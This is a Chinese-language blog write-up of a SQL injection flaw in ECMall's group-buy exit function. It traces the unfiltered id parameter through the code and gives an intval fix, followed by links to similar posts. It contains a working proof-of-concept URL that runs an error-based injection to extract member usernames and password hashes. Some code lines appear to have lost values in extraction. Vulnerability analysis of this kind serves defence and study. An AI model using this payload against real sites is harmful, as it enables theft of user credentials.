catalog

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

Relevant Link:

2. 漏洞触发条件

0x1: POC

http://localhost/ecmall/index.php?app=buyer_groupbuy&act=exit_group&id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b

3. 漏洞影响范围
4. 漏洞代码分析

/app/buyer_groupbuy.app.php

function exit_group()

{

    //未对$id进行规范化过滤,导致攻击者可以传入非int型数据

    $id = empty($_GET['id']) ?  : $_GET['id'];

    if (!$id)

    {

        $this->show_warning('no_such_groupbuy');

        return false;

    }

    // 判断是否能退团

    if (!$this->_ican($id, ACT))

    {

        $this->show_warning('Hacking Attempt');

        return;

    }

    $member_mod = &m('member');

    $member_mod->unlinkRelation('join_groupbuy', $this->visitor->info['user_id'], $id);

    $this->show_message('exit_groupbuy_succeed');

}

跟进if (!$this->_ican($id, ACT))

function _ican($id, $act = '')

{

    $state_permission = array(

        GROUP_PENDING   => array(),

        GROUP_ON        => array('view', 'exit_group'),

        GROUP_END       => array('view'),

        GROUP_FINISHED  => array('view', 'buy'),

        GROUP_CANCELED  => array('view')

    );

    $group = current($this->_member_mod->getRelatedData('join_groupbuy', $this->visitor->info['user_id'], array(

        'conditions' => 'gb.group_id=' . $id,   //传入未过滤的$id参数

        'order' => 'gb.group_id DESC',

        'fields' => 'gb.state,groupbuy_log.order_id'

    )));

    if (!$group)

    {

        return false; // 越权或没有该团购

    }

    else

    {

        $state_permission[GROUP_FINISHED] = $group['order_id'] >  ? array('view', 'view_order') : array('view', 'buy');

    }

    if (empty($act))

    {

        return $state_permission[$group['state']]; // 返回该团购此状态时允许的操作

    }

    return in_array($act, $state_permission[$group['state']]) ? true : false; // 该团购此状态是否允许执行此操作

}

继续跟进$this->_member_mod->getRelatedData
/eccore/model/mode.base.php

function getRelatedData($relation_name, $ids, $find_param = array())

{

    $relation_info = $this->getRelation($relation_name);

    $model =& m($relation_info['model']);

    if (empty($ids))

    {

        $this->_error('no_ids_to_assoc', $model->getName());

        return false;

    }

    if ($relation_info['type'] != HAS_MANY && $relation_info['type'] != HAS_AND_BELONGS_TO_MANY)

    {

        $this->_error('invalid_assoc_model', $model->getName());

        return false;

    }

    $alias = $model->alias;

    /* 如果是多对多关系,则连接的表的别名为指定别名或中间表名,否则为模型的别名 */

    if ($relation_info['type'] == HAS_AND_BELONGS_TO_MANY)

    {

        $be_related = $model->getRelation($relation_info['reverse']);

        $alias = isset($be_related['alias']) ? $be_related['alias'] : $be_related['middle_table'];

    }

    /* 构造查询条件 */

    $conditions = $alias . '.' . $relation_info['foreign_key'] . ' ' . db_create_in($ids);   //主键值限定

    $conditions .= $relation_info['ext_limit'] ?

                ' AND ' . $this->_getExtLimit($relation_info['ext_limit'], $alias)

                : '';

    $conditions .= is_string($find_param['conditions']) ? ' AND ' . $find_param['conditions'] : '';

    $find_param['conditions'] = $conditions;

    /* 查询字段 */

    $find_param['fields'] = !empty($find_param['fields']) ?

                    $find_param['fields'] . ',' . $alias . '.' .$relation_info['foreign_key']

                    : '';

    switch ($relation_info['type'])

    {

        case HAS_MANY:

        break;

        case HAS_AND_BELONGS_TO_MANY:

        $find_param['join']   = !empty($find_param['join'])   ?

                        $find_param['join'] . ',' . $relation_info['reverse']

                        : $relation_info['reverse'];

        empty($find_param['order']) && $find_param['order'] = $model->alias . ".{$model->prikey} DESC";

        $find_param['index_key'] = array($relation_info['foreign_key'], $model->prikey);

        break;

    }

    return $model->find($find_param);

}

5. 防御方法

/app/buyer_groupbuy.app.php

function exit_group()

{

    //通过intval进行规范化过滤

    //$id = empty($_GET['id']) ? 0 : $_GET['id'];

    $id = empty($_GET['id']) ?  : intval( $_GET['id'] );

    if (!$id)

    {

        $this->show_warning('no_such_groupbuy');

        return false;

    }

    // 判断是否能退团

    if (!$this->_ican($id, ACT))

    {

        $this->show_warning('Hacking Attempt');

        return;

    }

    $member_mod = &m('member');

    $member_mod->unlinkRelation('join_groupbuy', $this->visitor->info['user_id'], $id);

    $this->show_message('exit_groupbuy_succeed');

}

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

ECMall /app/buyer_groupbuy.app.php SQL Injection Vul的更多相关文章

  1. ecshop /search.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP商城系统Search.php页面过滤不严导致SQL注入漏洞 ...

  2. ecshop /pick_out.php SQL Injection Vul By Local Variable Overriding

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 在进行输入变量本地模拟注册的时候,没有进行有效的GPC模拟过滤处理,导出 ...

  3. discuz /faq.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 . 通过获取管理员密码 . 对管理员密码进行破解.通过在cmd5.com ...

  4. ecshop /goods.php SQL Injection Vul

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: poc http://localhost ...

  5. ecshop /category.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://sebug.net/vuld ...

  6. ecshop /api/client/api.php、/api/client/includes/lib_api.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECShop存在一个盲注漏洞,问题存在于/api/client/api. ...

  7. ecshop /flow.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏 ...

  8. ecshop /includes/modules/payment/alipay.php SQL Injection Vul

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/ ...

  9. dedecms \plus\guestbook.php SQL Injection Vul By \plus\guestbook\edit.inc.php

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 注射漏洞成功需要条件如下 . php magic_quotes_gpc= ...

随机推荐

  1. Linux Linux程序练习十三(信号阻塞,捕获)

    /* * 题目: * 请编写一个程序,设置SIGINT和SIGQUIT信号, * 并在该程序中实现从文件中读取信息的操作, * 并保证在读取文件且只有在读取文件的过程中不会被发送的SIGINT和SIG ...

  2. git by example

    记一次回滚操作 路人甲让我修改一个bug,我在develop下修改了 路人甲让我push到releae/sdk0.7分支上 我本地操作切换到release分支并合并develop上的修改: git c ...

  3. 准备.Net转前端开发-WPF界面框架那些事,UI快速实现法

    题外话 打开博客园,查看首页左栏的”推荐博客”,排名前五的博客分别是(此处非广告):Artech.小坦克.圣殿骑士.腾飞(Jesse).数据之巅.再看看它们博客的最新更新时间:Artech(2014- ...

  4. mac 设置阿里企业邮箱

    接收邮件服务器:pop3.mxhichina.com或pop3.您的域名,端口:110 发送邮件服务器:smtp.mxhichina.com或smtp.您的域名,端口:25 IMAP协议设置 接收邮件 ...

  5. Ubuntu修改文件关联

    * 在system setting>details中可以设置一部分文件关联,很弱很破. * 右键open with只能临时选择打开方式,并且可选的打开方式十分有限.如果是自己编的程序,在列表中没 ...

  6. IOS_SearchBar搜索栏及关键字高亮

    搜索框的效果演示: 这个就是所谓的搜索框了,那么接下来我们看看如何使用代码来实现这个功能. 我所使用的数据是英雄联盟的英雄名单,是一个JSON数据的txt文件, JSON数据的处理代码如下所示: ? ...

  7. /var/spool/clientmqueue 下生成太多文件处理

    问题现象: linux操作系统中的/var/spool/clientmqueue/目录下存在大量文件. 原因分析: 系统中有用户开启了cron,而cron中执行的程序有输出内容,输出内容会以邮件形式发 ...

  8. 【Alpha版本】冲刺阶段——Day 9

    我说的都队 031402304 陈燊 031402342 许玲玲 031402337 胡心颖 03140241 王婷婷 031402203 陈齐民 031402209 黄伟炜 031402233 郑扬 ...

  9. Ubuntu14.04下jdk的安装

    1.下载JDK目前最新的JDK版本是:Java SE Development Kit 8u52.解压安装我们把JDK安装到这个路径:/usr/lib/jvm如果没有这个目录(第一次当然没有),我们就新 ...

  10. FragmentStatePageradapter 与 FragmentPageradapter的区别

    FragmentPageradapter : 会将fragment储存在内存中 每次加载页面读取内存中的fragment FragmentStatePageradapter: 不会将fragment储 ...